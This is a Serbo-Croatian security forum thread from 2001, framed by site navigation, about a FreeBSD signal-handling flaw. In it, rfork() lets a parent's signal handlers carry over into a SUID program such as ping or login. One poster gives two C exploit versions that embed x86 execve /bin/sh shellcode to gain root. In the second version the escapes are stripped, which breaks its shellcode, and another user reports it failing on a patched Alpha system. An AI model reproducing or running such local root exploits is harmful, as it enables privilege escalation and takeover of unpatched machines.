• Naslovna
• FAQ
• Pravilnik
• O ES-u
• Tim
• Korisnici
• Statistike

 

• elitesecurity ::
• elitemadzone ::
• EMAIL ::
• RSS ::
• ES Mobile

  Niste ulogovani?  Username :   Password:   

• Registracija
• Zaboravili ste password?
• Flashback ▲▼
• Login problem?

 

Pretraga:

 

Srodne teme 14.04.2024. Re: Gde je Kejt? (samo pogrešni odgovori) 08.10.2001. X nece da se startuje 30.07.2002. PHP 4.2.0 i 4.2.1 BUG!!! 24.04.2003. Microsoft izdao nove patcheve za rupe u IE i OE 15.10.2003. Line in i Delphi 12.03.2004. URL argument injection vulnerability 24.04.2004. T66 gubi signal i nedostupan Navigacija Brisanje liste Aktuelne teme u ovom forumu: Čitajući Ap0xov "The Art of Rev.. Slanje imejla sa sertifikovanim digita.. Sigurnost "cPanel directory passw.. Armitage in Back Track 5 Kako skinuti cod .htaccess zastita Reverse engineering rutera "doma�.. Programiranje protokola Backtrack- hitno pomoc!!! Security get inti ws Opasnost od "crnih lista" totalno flexibilan security modul za JEE Sunbelt Personal Firewall - netbios-ssn exploiting kroz mikrotik? ChapljaVM Code Obfuscator 0.0.1 alpha Izaberite forum: Linux Linux aplikacije Linux desktop okruženja Linux hardware Windows desktop Windows aplikacije Zaštita Office Windows drajveri Office :: Word Office :: Excel Macintosh Mac hardware Mac software Iphone Enterprise Networking SOHO Networking Wireless Windows mreže Linux mreže Wireless :: WiMax Wireless :: Mikrotik Wireless :: Wireless oprema Linux/UNIX serveri i servisi Unix BSD Skript jezici Security Virtualizacija Cloud Computing Services Security :: Kriptografija i enkripcija .NET 3D programiranje Art of Programming Asembler C/C++ programiranje Kernel i OS programiranje Pascal / Delphi / Kylix Java Embedded sistemi Perl PHP Python Visual Basic 6 Veštačka inteligencija Security Coding XML GameDev - Razvoj Igara Ostali programski jezici PHP :: PHP za početnike PHP :: Smarty template engine .NET :: .NET Desktop razvoj .NET :: ASP.NET .NET :: WPF Programiranje C/C++ programiranje :: C/C++ za početnike Baze podataka MySQL Oracle Access MS SQL Firebird/Interbase PostgreSQL Fiksna telefonija VoIP Udruženje korisnika teleko.. GSM - telefoni GSM - upotreba GSM - servisiranje Mreže i novosti Smartphone Mreže i novosti :: Mobilni internet Mreže i novosti :: Telenor - korisnički servis Mreže i novosti :: VIP - korisnički servis Mreže i novosti :: MTS - korisnički servis Smartphone :: Symbian OS Smartphone :: Windows Mobile Smartphone :: Android GSM - telefoni :: Nokia PDA Uređaji GPS Portable Players Anonimnost i privatnost ISP Browseri E-mail Instant Messaging FTP Google Hosting ISP :: Wireless mreže i ISP ISP :: ADSL E-mail :: Anti-spam Instant Messaging :: IRC Hosting :: Domeni Google :: Gmail E-Marketing Web aplikacije Web dizajn i CSS Web dizajn softver Web razvoj Pretraživači i SEO Flash Javascript i AJAX Web dizajn i CSS :: Kritike Grafički dizajn Izdavaštvo 3D modelovanje Rasterska grafika Vektorska grafika 3D modelovanje :: CAD/CAM Matične ploče, procesori .. Video karte i monitori Storage Ostali hardver Overclocking & Modding PC Konfiguracije Laptopovi Vodič za kupovinu - PC har.. Tablet PC Muzička produkcija Audio kompresija Audio softver Video produkcija Video kompresija Video softver Multimedijalni uređaji Digitalni fotoaparati Digitalne kamere Home Theater Digitalni fotoaparati :: Fotografija Digitalni fotoaparati :: Vodič za kupovinu - Digita.. Elektronika Elektrotehnika Elektronika :: TV uređaji Elektronika :: Radio elektronika i tehnika Elektronika :: Mikrokontroleri Elektronika :: Audio-elektronika Auto-elektronika :: Tuning Vodič za učenje Vodič za posao Vodič za emigraciju Fizika Matematika Nauka Sertifikati Informatika Vodič za učenje :: Seminarski radovi Vodič za učenje :: Obrazovne institucije Vodič za emigraciju :: Život u USA Vodič za emigraciju :: Život u Norveškoj Vodič za emigraciju :: Život u Nemačkoj E-Poslovanje E-Kupovina IT pravo i politika razvoja IT događaji IT berza poslova IS i ERP Ekonomija Berza Cryptocoins IT berza poslova :: Arhiva IT berze poslova IT pravo i politika razvoja :: Registar Nacionalnog ID E-Poslovanje :: E-Transakcije E-Poslovanje :: Forex E-Kupovina :: Platne kartice Digitalna Televizija Advocacy Ankete Predlozi i pitanja Vesti Čekaonica Vesti :: ES leto manifestacija MadZone TechZone Poljoprivreda AutoZone MotoZone Svakodnevnica Video igre MadZone :: Zanimljivi linkovi MadZone :: Kultura TechZone :: Ergonomija TechZone :: Grejanje TechZone :: Klimatizacija TechZone :: Bela tehnika AutoZone :: Fiat Panda club Lista poslednjih: 16, 32, 64, 128 poruka.

slash Član broj: 538 Poruke: 38 *.net.hinet.hr Profil signal handling related vulnerability's 22.07.2001. u 14:04 - pre 277 meseci Zanima me dali je netko naisao na ovakav bug te ga uspio exploitati ? Za one koji nisu upoznati sa tom vrstom bugova: http://razor.bindview.com/publish/papers/signals.txt Freelance security consultant - UNIX Administrator - www.avalon.hr - [email protected] Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 *.verat.net +1 Profil Re: signal handling related vulnerability's 22.07.2001. u 14:57 - pre 277 meseci Hmm ima nesto zabavno u vezi FreeBSD.Naime ako kreiras proces sa rfork() i pritome startujes neki SUID program.Signal akcije(handleri) se ne ciste za startovani proces vec se nasledjuje od parenta pa je moguce u parentu definisati signal() handler koji ce da izvrsi shellcode i onda detetu poslati signal tj. da SUID program popije signal i da skoci tamo gde smo mu mi kao parent odredili. Naime bug je ispravljen,ali daje moemntalno root-a na FreeBSD 4.x (za 3.x verovatno ce isto da da root-a) [Ovu poruku je menjao predator dana 07-22-2001 u 03:01 PM GMT] Odgovor na temu

slash Član broj: 538 Poruke: 38 *.net.hinet.hr Profil Re: signal handling related vulnerability's 22.07.2001. u 18:16 - pre 277 meseci Citat: predator je napisao: Hmm ima nesto zabavno u vezi FreeBSD.Naime ako kreiras proces sa rfork() i pritome startujes neki SUID program.Signal akcije(handleri) se ne ciste za startovani proces vec se nasledjuje od parenta pa je moguce u parentu definisati signal() handler koji ce da izvrsi shellcode i onda detetu poslati signal tj. da SUID program popije signal i da skoci tamo gde smo mu mi kao parent odredili. Naime bug je ispravljen,ali daje moemntalno root-a na FreeBSD 4.x (za 3.x verovatno ce isto da da root-a) [Ovu poruku je menjao predator dana 07-22-2001 u 03:01 PM GMT] mogao si postat neki example, jer osobno, nisam bas nesto ovo proucavao Freelance security consultant - UNIX Administrator - www.avalon.hr - [email protected] Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 *.verat.net +1 Profil Re: signal handling related vulnerability's 22.07.2001. u 22:28 - pre 277 meseci Evo : Code: #include<sys/types.h> #include<signal.h> #include<unistd.h> #include<stdlib.h> #include<stdio.h> char shell[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d" "\x53\x08\x52\x53\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh"; int main(){  int pid;  char *c0d3;  setenv("HOUSE",shell,1);  c0d3 = getenv("HOUSE");  signal(SIGINT,(sig_t)shell);  pid = rfork(RFPROC|RFSIGSHARE);  if ( pid  ==  0){    printf("Child \n");    execl("/sbin/ping","ping","127.0.0.1",0);    _exit(0);  } else {  printf("parent\n");  sleep(1);  printf("Sendign signal\n");  kill(pid,SIGINT);  for(;;); } }  Ovo je slican kod kao sto je GEorgi Guninski poslao samo sam ga malo ja preuradio,zamenio shellcode i da umesto ping stavite login jer po recima Georgi Guninskog ping nece da da euid = 0. [Ovu poruku je menjao predator dana 07-23-2001 u 12:34 AM GMT] Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 *.verat.net +1 Profil Re: signal handling related vulnerability's 22.07.2001. u 22:48 - pre 277 meseci Kod bi trebalo da radi ;o) Nisam ga probao jel sam patchvoao kernel. Odgovor na temu

Riste Pejov Team Leader/Senior Software Developer @ Ein-Sof ltd Skopje Skopje, Macedonia Član broj: 128 Poruke: 571 195.159.14.* Jabber: richie@bagra.net.mk ICQ: 154236769 Sajt: riste.softver.org.mk Profil Re: signal handling related vulnerability's 24.07.2001. u 02:53 - pre 276 meseci Probao sam tvoj code na FreeBSD 4.2 RELEASE i nije radio ... valjda je patchiran na ovoj verzii People who think they know everything tend to irritate those of us who do. Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 *.verat.net +1 Profil Re: signal handling related vulnerability's 24.07.2001. u 14:39 - pre 276 meseci Probaj ovaj kod ,naso sam gresku : Code: #include<sys/types.h> #include<signal.h> #include<unistd.h> #include<stdlib.h> #include<stdio.h> char shell[]= "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "xebx17x5bx31xc0x88x43x07x89x5bx08x89x43x0cx50x8d" "x53x08x52x53xb0x3bx50xcdx80xe8xe4xffxffxff/bin/sh"; int main(int argc,char **argv){  int pid;  char *c0d3;  if (!(c0d3 = getenv("HOUSE")) ){      setenv("HOUSE",shell,1);      execl(argv[0],argv[0],NULL);  }  pid = rfork(RFPROC|RFSIGSHARE);  if ( pid  ==  0){     printf("Child n");    execl("/usr/bin/login","login",NULL);    _exit(0);  } else {  printf("parentn");  printf("%pn",c0d3);  fflush(stdout);  sleep(1);  signal(SIGINT,(sig_t)shell);  printf("Sendign signaln");  kill(pid,SIGINT);  for(;;); } }  Odgovor na temu

Riste Pejov Team Leader/Senior Software Developer @ Ein-Sof ltd Skopje Skopje, Macedonia Član broj: 128 Poruke: 571 *.dialup-maxtnt.on.net.mk Jabber: richie@bagra.net.mk ICQ: 154236769 Sajt: riste.softver.org.mk Profil Re: signal handling related vulnerability's 31.07.2001. u 04:27 - pre 276 meseci Ma nece ni taj da radi nisam probao ali sam siguran ... mislim da nisam napomenuo ... ali shell code ti je za x86, a freeBSD je na Alphu People who think they know everything tend to irritate those of us who do. Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 *.verat.net +1 Profil Re: signal handling related vulnerability's 31.07.2001. u 12:15 - pre 276 meseci e jebiga nikad nisam radio na Alphi niti znam njen assembler tako da ne mogu da napisem shell code za to ;o) Odgovor na temu